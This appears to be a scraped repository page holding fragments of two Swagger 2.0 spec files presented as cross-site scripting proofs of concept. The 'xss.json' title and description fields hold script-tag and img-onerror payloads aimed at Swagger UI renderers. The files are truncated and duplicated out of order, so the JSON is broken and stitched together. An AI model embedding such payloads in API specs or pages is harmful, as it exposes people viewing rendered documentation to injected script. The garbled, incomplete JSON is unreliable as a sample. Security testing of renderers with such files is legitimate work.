xomcoom

## blindSwagger.json
{
  "swagger": "2.0",
  "info": {
    "version": "1.0.0",
    "title": "Swagger Blind XSS PoC",
    "description": "This Swagger spec demonstrates blind XSS via definition defaults."
  },
  "paths": {
    "/test": {
      "get": {

## xss.json
{
  "swagger" : "2.0",
  "info" : {
    "version" : "1.0.100",
    "title" : "title<script language=\"javascript\">alert('1')</script>",
    "description" : "description with <img src=x onerror=alert(1)></img> <img src=x onerror=alert('XSS')> **markdown** format <script language=\"javascript\">alert('script-in-description')</script> <img src=x onerror=alert(\"img-in-description\")>"
  },
  "tags" : [ {
    "name" : "Admin",
    "description" : "tag with **markdown**"
	{
	"swagger": "2.0",
	"info": {
	"version": "1.0.0",
	"title": "Swagger Blind XSS PoC",
	"description": "This Swagger spec demonstrates blind XSS via definition defaults."
	},
	"paths": {
	"/test": {
	"get": {
	{
	"swagger" : "2.0",
	"info" : {
	"version" : "1.0.100",
	"title" : "title<script language=\"javascript\">alert('1')</script>",
	"description" : "description with <img src=x onerror=alert(1)></img> <img src=x onerror=alert('XSS')> markdown format <script language=\"javascript\">alert('script-in-description')</script> <img src=x onerror=alert(\"img-in-description\")>"
	},
	"tags" : [ {
	"name" : "Admin",
	"description" : "tag with markdown"